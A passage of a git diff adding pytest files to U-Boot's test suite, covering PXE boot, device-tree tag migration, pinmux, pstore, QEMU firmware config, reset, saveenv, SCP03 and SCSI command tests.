of this file. + """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot_config(ubman): + """Test the pxe boot command by selecting different combination of labels + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + local_label = f['local_label'] + empty_label = f['empty_label'] + exp_str_local = f['exp_str_local'] + exp_str_empty = f['exp_str_empty'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + + # pxe config is loaded where multiple labels are there and need to + # select particular label to boot and check for expected string + # In this case, local label is selected and it should look for + # localcmd env variable and if that variable is not defined it + # should not boot it and come out to u-boot prompt + ubman.wait_for('Enter choice:') + ubman.run_command(local_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_local]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_local} did not match!' + + # In this case, empty label is selected and it should look for + # kernel image path and if it is not set it should fail it and load + # default label to boot + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + ubman.wait_for('Enter choice:') + ubman.run_command(empty_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_empty]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_empty} did not match!' + + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot_config_invalid(ubman): + """Test the pxe boot command by selecting invalid label + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + invalid_label = f['invalid_label'] + exp_str_invalid = f['exp_str_invalid'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + + # pxe config is loaded where multiple labels are there and need to + # select particular label to boot and check for expected string + # In this case invalid label is selected, it should load invalid + # label and if it fails it should load the default label to boot + ubman.wait_for('Enter choice:') + ubman.run_command(invalid_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_invalid]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_invalid} did not match!' + + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() diff --git a/test/py/tests/test_of_migrate.py b/test/py/tests/test_of_migrate.py new file mode 100644 index 00000000000..ab89332331e --- /dev/null +++ b/test/py/tests/test_of_migrate.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2023 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +"""Test handling of unmigrated u-boot,dm- tags""" + +import os +import pytest + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR1 = '/tmp/test_no_migrate' +TMPDIR2 = '/tmp/test_no_migrate_spl' +TMPDIR3 = '/tmp/test_migrate' + +def build_for_migrate(ubman, replace_pair, board, tmpdir, disable_migrate=True): + """Build an updated U-Boot with a slightly modified device tree + + Args: + ubman (ConsoleBase): U-Boot console + replace_pair (tuple): + String to find + String to replace it with + board (str): Board to build + tmpdir (str): Temporary directory to use + disable_migrate (bool): True to disable CONFIG_OF_TAG_MIGRATE in build + """ + srcdir = ubman.config.source_dir + build_dir = ubman.config.build_dir + + # Get the source for the existing dts + dt_dir = os.path.join(build_dir, 'arch', 'sandbox', 'dts') + orig_fname = os.path.join(dt_dir, 'sandbox.dtb') + out_dts = os.path.join(dt_dir, 'sandbox_out.dts') + utils.run_and_log(ubman, ['dtc', orig_fname, '-I', 'dtb', '-O', 'dts', + '-o', out_dts]) + + # Update it to use an old tag + with open(out_dts) as inf: + data = inf.read() + data = data.replace(*replace_pair) + + dts_fname = os.path.join(dt_dir, 'sandbox_oldtag.dts') + with open(dts_fname, 'w') as outf: + print(data, file=outf) + dtb_fname = os.path.join(dt_dir, 'sandbox_oldtag.dtb') + utils.run_and_log(ubman, ['dtc', dts_fname, '-o', dtb_fname]) + + migrate = ['-a', '~CONFIG_OF_TAG_MIGRATE'] if disable_migrate else [] + + # Build sandbox with this new dtb, turning off OF_TAG_MIGRATE + env = dict(os.environ) + env['EXT_DTB'] = dtb_fname + env['DEVICE_TREE'] = 'sandbox_new' + env['NO_LTO'] = '1' # Speed up build + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', board, + *migrate, '-w', '-o', tmpdir], ignore_errors=True, env=env) + return out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_no_migrate(ubman): + """Test sandbox with old boot phase tags like u-boot,dm-pre-proper""" + + build_for_migrate(ubman, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR1) + + # It should fail to run, since the lcd device will not be bound before + # relocation. so won't get its frame-buffer memory + out = utils.run_and_log( + ubman, [os.path.join(TMPDIR1, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Video device 'lcd' cannot allocate frame buffer memory" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.boardspec('spl_of_platdata_inst') +@pytest.mark.boardspec('!sandbox_tpl') +def test_of_no_migrate_spl(ubman): + """Test sandbox with old boot phase tags like u-boot,dm-spl""" + + out = build_for_migrate(ubman, ['bootph-pre-ram', 'u-boot,dm-spl'], + 'sandbox_spl', TMPDIR2) + + # It should fail to build, since the SPL DT will not include 'spl-test' + # node, among others + assert "undefined type ‘struct dtd_sandbox_spl_test’" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_migrate(ubman): + """Test sandbox shows a message when tags were migrated""" + + build_for_migrate(ubman, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR3, disable_migrate=False) + + # It should show a migration message + out = utils.run_and_log( + ubman, [os.path.join(TMPDIR3, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Warning: Device tree includes old 'u-boot,dm-' tags" in out diff --git a/test/py/tests/test_ofplatdata.py b/test/py/tests/test_ofplatdata.py new file mode 100644 index 00000000000..d31fa55f7c7 --- /dev/null +++ b/test/py/tests/test_ofplatdata.py @@ -0,0 +1,22 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl_of_platdata') +def test_spl_devicetree(ubman): + """Test content of spl device-tree""" + dtb = ubman.config.build_dir + '/spl/u-boot-spl.dtb' + fdtgrep = ubman.config.build_dir + '/tools/fdtgrep' + output = utils.run_and_log(ubman, [fdtgrep, '-l', dtb]) + + assert "bootph-all" not in output + assert "bootph-some-ram" not in output + assert "bootph-pre-ram" not in output + assert "bootph-pre-sram" not in output + + assert "spl-test5" not in output + assert "spl-test6" not in output + assert "spl-test7" in output diff --git a/test/py/tests/test_optee_rpmb.py b/test/py/tests/test_optee_rpmb.py new file mode 100644 index 00000000000..04b3b5e41ef --- /dev/null +++ b/test/py/tests/test_optee_rpmb.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Tests for OP-TEE RPMB read/write support + +""" +This tests optee_rpmb cmd in U-Boot +""" + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_optee_rpmb') +def test_optee_rpmb_read_write(ubman): + """Test OP-TEE RPMB cmd read/write + """ + response = ubman.run_command('optee_rpmb write_pvalue test_variable test_value') + assert response == 'Wrote 11 bytes' + + response = ubman.run_command('optee_rpmb read_pvalue test_variable 11') + assert response == 'Read 11 bytes, value = test_value' diff --git a/test/py/tests/test_part.py b/test/py/tests/test_part.py new file mode 100644 index 00000000000..04c95a6d3cc --- /dev/null +++ b/test/py/tests/test_part.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.buildconfigspec('partitions') +@pytest.mark.buildconfigspec('efi_partition') +def test_part_types(ubman): + """Test that `part types` prints a result which includes `EFI`.""" + output = ubman.run_command('part types') + assert "Supported partition tables:" in output + assert "EFI" in output diff --git a/test/py/tests/test_pinmux.py b/test/py/tests/test_pinmux.py new file mode 100644 index 00000000000..ee79e843341 --- /dev/null +++ b/test/py/tests/test_pinmux.py @@ -0,0 +1,85 @@ +# SPDX-License-Identifier: GPL-2.0 + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_1(ubman): + """Test that 'pinmux' command without parameters displays + pinmux usage.""" + output = ubman.run_command('pinmux') + assert 'Usage:' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_2(ubman): + """Test that 'pinmux status' executed without previous "pinmux dev" + command displays error message.""" + output = ubman.run_command('pinmux status') + assert 'pin-controller device not selected' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status_all(ubman): + """Test that 'pinmux status -a' displays pin's muxing.""" + output = ubman.run_command('pinmux status -a') + + assert ('pinctrl-gpio:' in output) + assert ('a5 : gpio output .' in output) + assert ('a6 : gpio output .' in output) + + assert ('pinctrl:' in output) + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_list(ubman): + """Test that 'pinmux list' returns the pin-controller list.""" + output = ubman.run_command('pinmux list') + assert 'sandbox_pinctrl' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_dev_bad(ubman): + """Test that 'pinmux dev' returns an error when trying to select a + wrong pin controller.""" + pincontroller = 'bad_pin_controller_name' + output = ubman.run_command('pinmux dev ' + pincontroller) + expected_output = 'Can\'t get the pin-controller: ' + pincontroller + '!' + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_dev(ubman): + """Test that 'pinmux dev' select the wanted pin controller.""" + pincontroller = 'pinctrl' + output = ubman.run_command('pinmux dev ' + pincontroller) + expected_output = 'dev: ' + pincontroller + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status(ubman): + """Test that 'pinmux status' displays selected pincontroller's pin + muxing descriptions.""" + ubman.run_command('pinmux dev pinctrl') + output = ubman.run_command('pinmux status') + + assert (not 'pinctrl-gpio:' in output) + assert (not 'pinctrl:' in output) + + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) diff --git a/test/py/tests/test_pstore.py b/test/py/tests/test_pstore.py new file mode 100644 index 00000000000..70e07503ad3 --- /dev/null +++ b/test/py/tests/test_pstore.py @@ -0,0 +1,77 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Collabora +# Author: Frédéric Danis <frederic.danis@collabora.com> + +import pytest +import utils +import os +import tempfile +import shutil + +PSTORE_ADDR=0x3000000 +PSTORE_LENGTH=0x100000 +PSTORE_PANIC1='test/py/tests/test_pstore_data_panic1.hex' +PSTORE_PANIC2='test/py/tests/test_pstore_data_panic2.hex' +PSTORE_CONSOLE='test/py/tests/test_pstore_data_console.hex' +ADDR=0x01000008 + +def load_pstore(ubman): + """Load PStore records from sample files""" + + output = ubman.run_command_list([ + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR, + os.path.join(ubman.config.source_dir, PSTORE_PANIC1)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 4096, + os.path.join(ubman.config.source_dir, PSTORE_PANIC2)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 253 * 4096, + os.path.join(ubman.config.source_dir, PSTORE_CONSOLE)), + 'pstore set 0x%x 0x%x' % (PSTORE_ADDR, PSTORE_LENGTH)]) + +def checkfile(ubman, path, filesize, checksum): + """Check file against MD5 checksum""" + + output = ubman.run_command_list([ + 'load hostfs - %x %s' % (ADDR, path), + 'printenv filesize']) + assert('filesize=%x' % (filesize) in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(checksum in ''.join(output)) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_all_records(ubman): + """Test that pstore displays all records.""" + + ubman.run_command('') + load_pstore(ubman) + response = ubman.run_command('pstore display') + assert('**** Dump' in response) + assert('**** Console' in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_one_record(ubman): + """Test that pstore displays only one record.""" + + ubman.run_command('') + load_pstore(ubman) + response = ubman.run_command('pstore display dump 1') + assert('Panic#2 Part1' in response) + assert('**** Console' not in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_save_records(ubman): + """Test that pstore saves all records.""" + + outdir = tempfile.mkdtemp() + + ubman.run_command('') + load_pstore(ubman) + ubman.run_command('pstore save hostfs - %s' % (outdir)) + + checkfile(ubman, '%s/dmesg-ramoops-0' % (outdir), 3798, '8059335ab4cfa62c77324c491659c503') + checkfile(ubman, '%s/dmesg-ramoops-1' % (outdir), 4035, '3ff30df3429d81939c75d0070b5187b9') + checkfile(ubman, '%s/console-ramoops-0' % (outdir), 4084, 'bb44de4a9b8ebd9b17ae98003287325b') + + shutil.rmtree(outdir) diff --git a/test/py/tests/test_pstore_data_console.hex b/test/py/tests/test_pstore_data_console.hex Binary files differnew file mode 100644 index 00000000000..e7f426e8928 --- /dev/null +++ b/test/py/tests/test_pstore_data_console.hex diff --git a/test/py/tests/test_pstore_data_panic1.hex b/test/py/tests/test_pstore_data_panic1.hex Binary files differnew file mode 100644 index 00000000000..988929d12c2 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic1.hex diff --git a/test/py/tests/test_pstore_data_panic2.hex b/test/py/tests/test_pstore_data_panic2.hex Binary files differnew file mode 100644 index 00000000000..8f9d56cbe01 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic2.hex diff --git a/test/py/tests/test_qfw.py b/test/py/tests/test_qfw.py new file mode 100644 index 00000000000..844cd3d9367 --- /dev/null +++ b/test/py/tests/test_qfw.py @@ -0,0 +1,26 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Asherah Connor <ashe@kivikakk.ee> + +# Test qfw command implementation + +import pytest + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_cpus(ubman): + "Test QEMU firmware config reports the CPU count." + + output = ubman.run_command('qfw cpus') + # The actual number varies depending on the board under test, so only + # assert a non-zero output. + assert 'cpu(s) online' in output + assert '0 cpu(s) online' not in output + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_list(ubman): + "Test QEMU firmware config lists devices." + + output = ubman.run_command('qfw list') + # Assert either: + # 1) 'test-one', from the sandbox driver, or + # 2) 'bootorder', found in every real QEMU implementation. + assert ("bootorder" in output) or ("test-one" in output) diff --git a/test/py/tests/test_reset.py b/test/py/tests/test_reset.py new file mode 100644 index 00000000000..af079a70664 --- /dev/null +++ b/test/py/tests/test_reset.py @@ -0,0 +1,63 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__reset_test_skip to True if reset test is not possible or desired +# and should be skipped. +env__reset_test_skip = True + +# Setup env__reset_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__reset_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import test_000_version + +def setup_reset_env(ubman): + if ubman.config.env.get('env__reset_test_skip', False): + pytest.skip('reset test is not enabled') + + output = ubman.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = ubman.config.env.get('env__reset_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping reset test due to jtag bootmode') + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset(ubman): + """Test the reset command in non-JTAG bootmode. + It does COLD reset, which resets CPU, DDR and peripherals + """ + setup_reset_env(ubman) + ubman.run_command('reset', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(ubman) + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset_w(ubman): + """Test the reset -w command in non-JTAG bootmode. + It does WARM reset, which resets CPU but keep DDR/peripherals active. + """ + setup_reset_env(ubman) + ubman.run_command('reset -w', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(ubman) diff --git a/test/py/tests/test_sandbox_exit.py b/test/py/tests/test_sandbox_exit.py new file mode 100644 index 00000000000..9610adf1fe7 --- /dev/null +++ b/test/py/tests/test_sandbox_exit.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import signal + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('sysreset_cmd_poweroff') +def test_poweroff(ubman): + """Test that the "poweroff" command exits sandbox process.""" + + ubman.run_command('poweroff', wait_for_prompt=False) + assert(ubman.validate_exited()) + +@pytest.mark.boardspec('sandbox') +def test_ctrl_c(ubman): + """Test that sending SIGINT to sandbox causes it to exit.""" + + ubman.kill(signal.SIGINT) + assert(ubman.validate_exited()) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.buildconfigspec('sandbox_crash_reset') +def test_exception_reset(ubman): + """Test that SIGILL causes a reset.""" + + ubman.run_command('exception undefined', wait_for_prompt=False) + m = ubman.p.expect(['resetting ...', 'U-Boot']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + m = ubman.p.expect(['U-Boot', '=>']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + ubman.restart_uboot() + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.notbuildconfigspec('sandbox_crash_reset') +def test_exception_exit(ubman): + """Test that SIGILL causes a reset.""" + + ubman.run_command('exception undefined', wait_for_prompt=False) + assert(ubman.validate_exited()) diff --git a/test/py/tests/test_sandbox_opts.py b/test/py/tests/test_sandbox_opts.py new file mode 100644 index 00000000000..48f5b313870 --- /dev/null +++ b/test/py/tests/test_sandbox_opts.py @@ -0,0 +1,28 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_cmdline' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_cmdline(ubman): + """Test building sandbox without CONFIG_CMDLINE""" + + utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~CMDLINE', '-o', TMPDIR]) + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_lto(ubman): + """Test building sandbox without CONFIG_LTO""" + + utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~LTO', '-o', TMPDIR]) diff --git a/test/py/tests/test_saveenv.py b/test/py/tests/test_saveenv.py new file mode 100644 index 00000000000..019b229d30e --- /dev/null +++ b/test/py/tests/test_saveenv.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__saveenv_test_skip to True if saveenv test is not possible or +# desired and should be skipped. +env__saveenv_test_skip = True + +# Setup env__saveenv_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__saveenv_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import random +import ipaddress +import string +import uuid + +# Setup the env +def setup_saveenv_env(ubman): + if ubman.config.env.get('env__saveenv_test_skip', False): + pytest.skip('saveenv test is not enabled') + + output = ubman.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = ubman.config.env.get('env__saveenv_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping saveenv test due to jtag bootmode') + +# Check return code +def ret_code(ubman): + return ubman.run_command('echo $?') + +# Verify env variable +def check_env(ubman, var_name, var_value): + if var_value: + output = ubman.run_command(f'printenv {var_name}') + var_value = str(var_value) + if (var_value.startswith("'") and var_value.endswith("'")) or ( + var_value.startswith('"') and var_value.endswith('"') + ): + var_value = var_value.split(var_value[-1])[1] + assert var_value in output + assert ret_code(ubman).endswith('0') + else: + ubman.p.send(f'printenv {var_name}\n') + output = ubman.p.expect(['not defined']) + assert output == 0 + assert ret_code(ubman).endswith('1') + +# Set env variable +def set_env(ubman, var_name, var_value): + ubman.run_command(f'setenv {var_name} {var_value}') + assert ret_code(ubman).endswith('0') + check_env(ubman, var_name, var_value) + +@pytest.mark.buildconfigspec('cmd_saveenv') +@pytest.mark.buildconfigspec('hush_parser') +def test_saveenv(ubman): + """Test the saveenv command in non-JTAG bootmode. + It saves the U-Boot environment in persistent storage. + """ + setup_saveenv_env(ubman) + + # Set env for random mac address + rand_mac = '%02x:%02x:%02x:%02x:%02x:%02x' % ( + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + ) + set_env(ubman, 'mac_addr', rand_mac) + + # Set env for random IPv4 address + rand_ipv4 = ipaddress.IPv4Address._string_from_ip_int( + random.randint(0, ipaddress.IPv4Address._ALL_ONES) + ) + set_env(ubman, 'ipv4_addr', rand_ipv4) + + # Set env for random IPv6 address + rand_ipv6 = ipaddress.IPv6Address._string_from_ip_int( + random.randint(0, ipaddress.IPv6Address._ALL_ONES) + ) + set_env(ubman, 'ipv6_addr', rand_ipv6) + + # Set env for random number + rand_num = random.randrange(1, 10**9) + set_env(ubman, 'num_var', rand_num) + + # Set env for uuid + uuid_str = uuid.uuid4().hex.lower() + set_env(ubman, 'uuid_var', uuid_str) + + # Set env for random string including special characters + sc = "!#%&()*+,-./:;<=>?@[\\]^_`{|}~" + rand_str = ''.join( + random.choices(' ' + string.ascii_letters + sc + string.digits, k=300) + ) + set_env(ubman, 'str_var', f'"{rand_str}"') + + # Set env for empty string + set_env(ubman, 'empty_var', '') + + # Save the env variables + ubman.run_command('saveenv') + assert ret_code(ubman).endswith('0') + + # Reboot + ubman.run_command('reset', wait_for_reboot=True) + + # Verify the saved env variables + check_env(ubman, 'mac_addr', rand_mac) + check_env(ubman, 'ipv4_addr', rand_ipv4) + check_env(ubman, 'ipv6_addr', rand_ipv6) + check_env(ubman, 'num_var', rand_num) + check_env(ubman, 'uuid_var', uuid_str) + check_env(ubman, 'str_var', rand_str) + check_env(ubman, 'empty_var', '') diff --git a/test/py/tests/test_scp03.py b/test/py/tests/test_scp03.py new file mode 100644 index 00000000000..414b4251a69 --- /dev/null +++ b/test/py/tests/test_scp03.py @@ -0,0 +1,27 @@ +# Copyright (c) 2021 Foundries.io Ltd +# +# SPDX-License-Identifier: GPL-2.0+ +# +# SCP03 command test + +""" +This tests SCP03 command in U-Boot. + +For additional details check doc/usage/scp03.rst +""" + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_scp03') +def test_scp03(ubman): + """Enable and provision keys with SCP03 + """ + + success_str1 = "SCP03 is enabled" + success_str2 = "SCP03 is provisioned" + + response = ubman.run_command('scp03 enable') + assert success_str1 in response + response = ubman.run_command('scp03 provision') + assert success_str2 in response diff --git a/test/py/tests/test_scsi.py b/test/py/tests/test_scsi.py new file mode 100644 index 00000000000..2a35e47e558 --- /dev/null +++ b/test/py/tests/test_scsi.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the SCSI device number, type and capacity. This test will be automatically +skipped without this. + +For example: + +# Setup env__scsi_device_test to set the SCSI device number/slot, the type of +device, and the device capacity in MB. +env__scsi_device_test = { + 'dev_num': 0, + 'device_type': 'Hard Disk', + 'device_capacity': '476940.0 MB', +} +""" + +def scsi_setup(ubman): + f = ubman.config.env.get('env__scsi_device_test', None) + if not f: + pytest.skip('No SCSI device to test') + + dev_num = f.get('dev_num', None) + if not isinstance(dev_num, int): + pytest.skip('No device number specified in env file to read') + + dev_type = f.get('device_type') + if not dev_type: + pytest.skip('No device type specified in env file to read') + + dev_size = f.get('device_capacity') + if not dev_size: + pytest.skip('No device capacity specified in env file to read') + + return dev_num, dev_type, dev_size + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_reset(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi reset') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_info(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi info') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_scan(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi scan') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_dev(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi device') + assert 'no scsi devices available' not in output + assert f'device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + output = ubman.run_command('scsi device %d' % dev_num) + assert 'is now current device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + 